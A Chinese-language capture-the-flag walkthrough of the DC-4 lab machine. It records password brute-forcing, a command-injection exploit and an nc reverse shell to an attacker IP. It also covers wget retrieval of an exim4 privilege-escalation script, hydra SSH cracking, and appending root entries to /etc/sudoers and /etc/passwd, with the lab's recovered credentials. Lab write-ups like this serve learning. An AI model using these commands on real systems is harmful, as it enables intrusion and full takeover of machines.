DC-4
信息收集
- 使用nmap扫描出靶机所处192.168.78.153网段 再扫描一下细致的内容,发现开放80网站和22 ssh端口。感觉多半要获取用户名和密码来进行ssh连接了
web渗透
- 访问网站,是一个登录窗,根据标题给出admin提示,感觉用户名就是admin了,查看了一圈没有什么提示,看来多半要爆破密码了
- 由web 1靶机给出的经验,再使用dirb扫描一下,很好,直接进行爆破
- 输入参数提交抓包,发送到攻击模块,加载弱密码文件,进行爆破,得出密码为happy
- 登录之后,发现有几个功能,执行了之后发现都是Linux系统命令,没有能输入命令的地方,灵机一动抓包会不会显示命令执行语句呢
漏洞利用
- 正如所料,还真能抓包查看到执行命令,那就开始修改命令查看是否可行 传入id发现成功返回 出现了rce命令执行漏洞
- 既然能直接执行系统命令,那就直接使用 nc 将当前web用户的shell反弹到虚拟机上,输入
nc -e /binbash 192.168.78.145 7777
- 当然第一反应也想到写入一个木马文件,但尝试发现失败了,在kali里面尝试写入,发现参数没有了。在burp写入连文件都没有创建,可能权限不够吧
漏洞利用 获取shell
- 将反弹的shell转换成交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
- 先来到home文件下,查看有没有什么文件可以查看
- 查看一下etc/passwd,发现一共有三个用户为1000以上的,看来少不了ssh切换用户了
- 查看了一圈文件发现jim文件夹内有一个备份的密码
提升权限 1
- 使用find命令查找suid提权
find / -user root -perm -4000 -print 2>/dev/null
发现了一个exim4,之前有用过这个提权,查看一下版本为
- 查看版本为4.89,似乎正好可以进行本地提权的漏洞版本之间的
searchsploit exim
查找可利用的提权POC 找到目标
- 将脚本保存到桌面
cp /usr/share/exploitdb/exploits/linux/local/46996.sh 1.sh
- 查看POC的文件尾格式,发现依旧是windows版本,修改成Linux版本
- 将脚本文件导入到/var/www/html中,使用wget下载提权脚本到目标机中
启动阿帕奇服务 sudo service apache2 start
cp 1.sh /var/www/html/1.sh
chmod 777 1.sh
wget http://192.168.78.128/1.sh
- 执行脚本提权查看
- 查看flag文件
权限提升2
- 既然已经有了密码文件,用户名肯定也就是home文件夹下的那几个了,使用hydra进行ssh爆破
hydra.exe -L user.txt -P DC-4pass.txt ssh://192.168.78.153
jim : jibril04
- 使用ssh登录到 jim用户
- 查看了一圈没有什么可以查看的内容,也没有查找到其他用户的密码
grep -rns charles
,查看wp发现了需要去查看/etc/mail 可以查看到 charles 用户发送给jim的密码
- 据了解,jim用户有权利访问mbox文件,查看文件内容发现是一个邮件信息,所以转念去想/etc/mail邮件信息。而且mbox也是邮件信息的一种格式
- 登录账户
ssh charles@192.168.78.153
密码:^xHhA&hvim0y
- 使用suid -l 查看当前用户具有的权限 发现可以不需要密码就能使用root权限去执行
/usr/bin/teehee
- 查看teehee的使用方法,发现 -a参数可以将内容写入到一个文件中,而且不会覆盖,这就难免要想到DC-9靶机可以写入/etc/passwd账号密码,也可以写入/etc/sudoers 另账号具有所有的root权限
- 所以现在就进行将charles用户 提升为具有root权限
charles ALL=(ALL:ALL) ALL
payloadecho "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers
- sudo -l 发现用户确实有了root权限。直接使用 sudo su来提升为root权限,输入密码即可
- 获取flag
总结
本次的DC-4靶机感觉难度挺简单,至少是第一次直接从靶机打到了提权部分,没看wp,因为exim4漏洞POC有使用过,直接提权上到root。在进行常规提权的时候查看了一下邮件信息的文件 找到了隐藏密码
- 暴力破解登录网站
- shell命令执行直接反弹shell到kali上
- find 发现exim4提权POC suid提权
- wget 下载虚拟机网站的文件 无法上传文件到目标机上
- hydra对ssh登录爆破
- mbox邮件格式文件 /etc/mail 保存邮件信息
- 使用 --help查看teehee的用法
- 可以随意写入文件,可以尝试写入新账户root权限到/etc/passwd 可以将当前账号赋予所有的root权限 /etc/sudoers
echo 'hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash' >> /etc/passwd
echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers
``